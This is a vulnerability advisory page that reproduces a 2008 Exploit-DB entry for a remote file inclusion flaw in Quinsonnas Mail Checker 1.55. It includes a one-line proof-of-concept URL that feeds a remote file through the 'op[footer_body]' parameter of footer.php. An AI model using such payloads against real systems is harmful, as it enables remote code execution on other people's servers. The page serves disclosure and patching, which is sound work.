header-logo
Suggest Exploit
vendor:
Quinsonnas Mail Checker
by:
Tryagi
9.3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Quinsonnas Mail Checker
Affected Version From: 1.55
Affected Version To: 1.55
Patch Exists: Yes
Related CWE: N/A
CPE: a:quinsonnas:quinsonnas_mail_checker
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Quinsonnas Mail Checker 1.55 (footer.php) Remote File Inclusion Vulnerabilities

Quinsonnas Mail Checker 1.55 is vulnerable to a remote file inclusion vulnerability. An attacker can exploit this vulnerability by sending a malicious URL in the 'op[footer_body]' parameter of the 'footer.php' script. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of Quinsonnas Mail Checker.
Source

Exploit-DB raw data:

### Quinsonnas Mail Checker 1.55 (footer.php) Remote File Inclusion Vulnerabilities
### http://switch.dl.sourceforge.net/sourceforge/quinsonnas/quinsonnas-1.55.tar.bz2
### POC :
###     /quinsonnas-1.55/footer.php?op[footer_body]=http://localhost/020.txt?
### I'm Tryagi - Tryag.Cc/cc -  :) 

# milw0rm.com [2008-02-23]